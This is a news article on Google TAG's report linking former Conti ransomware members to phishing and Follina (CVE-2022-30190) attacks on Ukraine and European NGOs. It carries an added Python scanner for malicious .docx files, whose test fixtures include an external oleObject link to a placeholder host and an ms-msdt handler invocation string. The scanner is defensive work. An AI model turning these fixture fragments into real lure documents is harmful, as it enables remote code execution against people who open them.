Wednesday, September 28, 2022

Former Conti ransomware gang members helped attack Ukraine, Google says

Shreya Christina, https://londonbusinessblog.com

A cybercriminal group that includes former members of the infamous Conti ransomware gang is targeting the Ukrainian government and European NGOs in the region, Google says.

The details come from a new blog post from the Threat Analysis Group (TAG), a team within Google dedicated to tracking state-sponsored cyber activity.

More than half a year into the war in Ukraine, cyber activity, including hacktivism and electronic warfare, has been a constant background to the fighting. TAG now says that profit-driven cybercriminals are becoming more active in the region as well.

Between April and August 2022, TAG tracked “an increasing number of financially motivated threat actors targeting Ukraine, whose activities are closely aligned with Russian government-backed attackers,” writes TAG’s Pierre-Marc Bureau. One of these actors had already been designated UAC-0098 by CERT-UA, Ukraine’s Computer Emergency Response Team. TAG’s new analysis links it to Conti, the prolific ransomware gang whose attack on the Costa Rican government in April and May of this year led the country to declare a national emergency.

“Based on multiple indicators, TAG assesses that some members of UAC-0098 are former members of the Conti cybercrime group who are re-using their techniques to target Ukraine,” Bureau writes.

The group known as UAC-0098 previously used the IcedID banking Trojan as a loader to deliver ransomware, but Google’s researchers say it is now shifting to campaigns that are “both politically and financially motivated”. According to TAG’s analysis, its members apply that expertise as initial access brokers: the operators who first compromise a network and then sell that access to other actors interested in exploiting the target.

In recent campaigns the group sent phishing emails to organizations in the Ukrainian hospitality industry while masquerading as Ukraine’s cyber police; in another case it targeted humanitarian NGOs in Italy with phishing emails sent from the compromised email account of an Indian hotel chain.

Other phishing campaigns posed as representatives of Starlink, the satellite internet system of Elon Musk’s SpaceX. These emails provided links to malware installers disguised as software needed to connect to the Internet through Starlink’s systems.

The Conti-linked group also exploited the Follina vulnerability (CVE-2022-30190, a remote code execution flaw in the Microsoft Support Diagnostic Tool, MSDT, reachable from a crafted Office document) shortly after it was publicly disclosed in late May this year. In these and other attacks it is not known exactly what actions UAC-0098 took after systems were compromised, TAG says.
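A Follina document does not carry the exploit itself: it holds an oleObject relationship whose target is an external URL, so Word fetches a remote HTML page when the file is opened, and script on that page invokes the ms-msdt: URI handler. The following Python scanner is an added illustration, not code from Google TAG’s report or from any tool it describes; it checks an OOXML package for those two indicators. The sample documents, the fixture contents and the address 198.51.100.7 are constructed for the example.

```python
"""Scan .docx packages for the relationship and URI-scheme indicators left by
Follina (CVE-2022-30190) style documents. Added example; fixtures are constructed."""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# Case-insensitive match on the raw bytes of every package part.
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def find_follina_indicators(docx_bytes: bytes) -> list[str]:
    """Return one finding per indicator seen in the OOXML package.

    Indicator 1: an oleObject relationship with TargetMode="External", i.e. Word
                 will fetch the embedded object from a remote URL when the
                 document is opened (the hop Follina documents use to load HTML).
    Indicator 2: the ms-msdt: URI scheme anywhere in the package, which ordinary
                 documents have no reason to contain.
    """
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    if (rel.get("Type") == OLE_REL_TYPE
                            and rel.get("TargetMode") == "External"):
                        findings.append(
                            f"{name}: external oleObject -> {rel.get('Target')}")
            if MSDT_RE.search(data):
                findings.append(f"{name}: contains ms-msdt: URI scheme")
    return findings


def build_sample_docx(rels_xml: str, document_xml: str = "<document/>") -> bytes:
    """Build a minimal in-memory OOXML package (constructed test fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed fixtures. 198.51.100.7 is a documentation address (RFC 5737).
BENIGN_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
    'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '</Relationships>'
)
SUSPICIOUS_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
    'Target="http://198.51.100.7/poc.html!" TargetMode="External"/>'
    '</Relationships>'
)
# A document that carries the handler call itself (for instance as a link) is
# caught by the scheme check; this content is a constructed fixture.
MSDT_DOCUMENT_XML = '<document>ms-msdt:/id PCWDiagnostic /skip force</document>'


if __name__ == "__main__":
    for label, blob in [
        ("benign", build_sample_docx(BENIGN_RELS)),
        ("external-ole", build_sample_docx(SUSPICIOUS_RELS)),
        ("inline-msdt", build_sample_docx(BENIGN_RELS, MSDT_DOCUMENT_XML)),
    ]:
        print(label, find_follina_indicators(blob) or "clean")
```

Microsoft’s published workaround before the June 2022 fix was to export and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key so the URI handler could not be invoked at all; a package scan like the one above complements that on the mail gateway or file share, where a document can be stopped before it reaches any endpoint.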

Overall, the Google researchers point to a “blurring of the lines between financially motivated and government-backed groups in Eastern Europe,” an indicator of how cyber threat actors often tailor their activities to the geopolitical interests of a given region.

But taking sides is not a guaranteed winning strategy. At the start of the invasion of Ukraine, Conti paid the price for openly declaring support for Russia when an anonymous person leaked more than a year of the group’s internal chat logs.
